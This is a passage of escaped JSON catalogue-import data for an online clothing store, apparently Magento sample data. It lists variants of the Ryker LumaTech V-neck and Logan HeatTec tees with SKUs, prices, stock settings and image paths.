qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms02-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms02-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"523\":{\"sku\":\"MS02-L-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Ryker LumaTech&trade; Tee (V-neck)-L-Gray\",\"description\":\"<p>Don\'t be fooled by its classic style; the Ryker LumaTech&trade; Tee embodies the future of performance apparel. Its featherweight blend of fabrics wicks away moisture to keep you cool and dry, whether racking up miles, hitting three pointers or strutting the boardwalk.<\\/p>\\n<p>&bull; Relaxed fit. <br \\/>&bull; Short-Sleeve. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ryker-lumatech-trade-tee-v-neck-l-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms02-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms02-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms02-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms02-gray_alt1.jpg,\\/m\\/s\\/ms02-gray_back.jpg\",\"image\":\"\\/m\\/s\\/ms02-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms02-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms02-gray_alt1.jpg,\\/m\\/s\\/ms02-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Gray\"},\"524\":{\"sku\":\"MS02-XL-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Ryker LumaTech&trade; Tee (V-neck)-XL-Black\",\"description\":\"<p>Don\'t be fooled by its classic style; the Ryker LumaTech&trade; Tee embodies the future of performance apparel. Its featherweight blend of fabrics wicks away moisture to keep you cool and dry, whether racking up miles, hitting three pointers or strutting the boardwalk.<\\/p>\\n<p>&bull; Relaxed fit. <br \\/>&bull; Short-Sleeve. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ryker-lumatech-trade-tee-v-neck-xl-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms02-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms02-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms02-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms02-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms02-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Black\"},\"525\":{\"sku\":\"MS02-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Ryker LumaTech&trade; Tee (V-neck)-XL-Blue\",\"description\":\"<p>Don\'t be fooled by its classic style; the Ryker LumaTech&trade; Tee embodies the future of performance apparel. Its featherweight blend of fabrics wicks away moisture to keep you cool and dry, whether racking up miles, hitting three pointers or strutting the boardwalk.<\\/p>\\n<p>&bull; Relaxed fit. <br \\/>&bull; Short-Sleeve. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ryker-lumatech-trade-tee-v-neck-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms02-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms02-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms02-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms02-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms02-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"526\":{\"sku\":\"MS02-XL-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Ryker LumaTech&trade; Tee (V-neck)-XL-Gray\",\"description\":\"<p>Don\'t be fooled by its classic style; the Ryker LumaTech&trade; Tee embodies the future of performance apparel. Its featherweight blend of fabrics wicks away moisture to keep you cool and dry, whether racking up miles, hitting three pointers or strutting the boardwalk.<\\/p>\\n<p>&bull; Relaxed fit. <br \\/>&bull; Short-Sleeve. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ryker-lumatech-trade-tee-v-neck-xl-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms02-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms02-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms02-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms02-gray_alt1.jpg,\\/m\\/s\\/ms02-gray_back.jpg\",\"image\":\"\\/m\\/s\\/ms02-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms02-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms02-gray_alt1.jpg,\\/m\\/s\\/ms02-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Gray\"},\"527\":{\"sku\":\"MS02\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Ryker LumaTech&trade; Tee (V-neck)\",\"description\":\"<p>Don\'t be fooled by its classic style; the Ryker LumaTech&trade; Tee embodies the future of performance apparel. Its featherweight blend of fabrics wicks away moisture to keep you cool and dry, whether racking up miles, hitting three pointers or strutting the boardwalk.<\\/p>\\n<p>&bull; Relaxed fit. <br \\/>&bull; Short-Sleeve. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms02-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms02-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms02-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Tee,material=LumaTech&trade;|Cotton|Rayon,pattern=Solid,climate=All-weather|Indoor|Warm,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=Yes\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MS02-XS-Black,size=XS,color=Black|sku=MS02-XS-Blue,size=XS,color=Blue|sku=MS02-XS-Gray,size=XS,color=Gray|sku=MS02-S-Black,size=S,color=Black|sku=MS02-S-Blue,size=S,color=Blue|sku=MS02-S-Gray,size=S,color=Gray|sku=MS02-M-Black,size=M,color=Black|sku=MS02-M-Blue,size=M,color=Blue|sku=MS02-M-Gray,size=M,color=Gray|sku=MS02-L-Black,size=L,color=Black|sku=MS02-L-Blue,size=L,color=Blue|sku=MS02-L-Gray,size=L,color=Gray|sku=MS02-XL-Black,size=XL,color=Black|sku=MS02-XL-Blue,size=XL,color=Blue|sku=MS02-XL-Gray,size=XL,color=Gray\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms02-gray_alt1.jpg,\\/m\\/s\\/ms02-gray_back.jpg\",\"image\":\"\\/m\\/s\\/ms02-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms02-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms02-gray_alt1.jpg,\\/m\\/s\\/ms02-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Tee\",\"material\":\"LumaTech&trade;|Cotton|Rayon\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Indoor|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"Yes\"},\"528\":{\"sku\":\"MS10-XS-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Logan  HeatTec&reg; Tee-XS-Black\",\"description\":\"<p>Soft and lightweight, the Logan HeatTec&reg; Tee gets you through the long haul in total comfort. It boasts superior sweat-wicking performance to keep skin dry and cool, and strategic flat-lock seams to resist chafing.<\\/p>\\n<p>&bull; Semi-fitted. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/tumble dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"logan-heattec-reg-tee-xs-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms10-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms10-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms10-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms10-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms10-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Black\"},\"529\":{\"sku\":\"MS10-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Logan  HeatTec&reg; Tee-XS-Blue\",\"description\":\"<p>Soft and lightweight, the Logan HeatTec&reg; Tee gets you through the long haul in total comfort. It boasts superior sweat-wicking performance to keep skin dry and cool, and strategic flat-lock seams to resist chafing.<\\/p>\\n<p>&bull; Semi-fitted. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/tumble dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"logan-heattec-reg-tee-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms10-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms10-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms10-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms10-blue_alt1.jpg,\\/m\\/s\\/ms10-blue_back.jpg\",\"image\":\"\\/m\\/s\\/ms10-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms10-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms10-blue_alt1.jpg,\\/m\\/s\\/ms10-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},\"530\":{\"sku\":\"MS10-XS-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Logan  HeatTec&reg; Tee-XS-Red\",\"description\":\"<p>Soft and lightweight, the Logan HeatTec&reg; Tee gets you through the long haul in total comfort. It boasts superior sweat-wicking performance to keep skin dry and cool, and strategic flat-lock seams to resist chafing.<\\/p>\\n<p>&bull; Semi-fitted. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/tumble dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"logan-heattec-reg-tee-xs-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms10-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms10-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms10-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms10-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms10-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Red\"},\"531\":{\"sku\":\"MS10-S-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Logan  HeatTec&reg; Tee-S-Black\",\"description\":\"<p>Soft and lightweight, the Logan HeatTec&reg; Tee gets you through the long haul in total comfort. It boasts superior sweat-wicking performance to keep skin dry and cool, and strategic flat-lock seams to resist 